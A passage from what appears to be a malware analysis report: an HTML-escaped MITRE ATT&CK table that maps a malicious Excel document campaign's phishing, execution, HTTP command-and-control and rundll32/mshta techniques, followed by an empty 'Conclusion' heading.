\n TECHNIQUE ID<\/strong><\/td>\n TACTIC<\/strong><\/td>\n TECHNIQUE DETAILS<\/strong><\/td>\n DESCRIPTION<\/strong><\/td>\n<\/tr>\n \n T1566<\/td>\n Initial access<\/td>\n Phishing attachment<\/td>\n Initial maldoc uses phishing strings to convince users to open the maldoc<\/td>\n<\/tr>\n \n T1204<\/td>\n Execution<\/td>\n User Execution<\/td>\n Manual execution by user<\/td>\n<\/tr>\n \n T1071<\/td>\n Command and Control<\/td>\n Standard Application Layer Protocol<\/td>\n Attempts to connect through HTTP<\/td>\n<\/tr>\n \n T1059<\/td>\n Command and Scripting Interpreter<\/td>\n Starts CMD.EXE for commands execution<\/td>\n Excel uses cmd and PowerShell to execute command<\/td>\n<\/tr>\n \n T1218<\/p>\n Signed Binary Proxy Execution<\/td>\n Uses RUNDLL32.EXE and MSHTA.EXE to load library<\/td>\n rundll32 is used to run the downloaded payload. Mshta is used to execute malicious JavaScript<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n Conclusion<\/h2>\n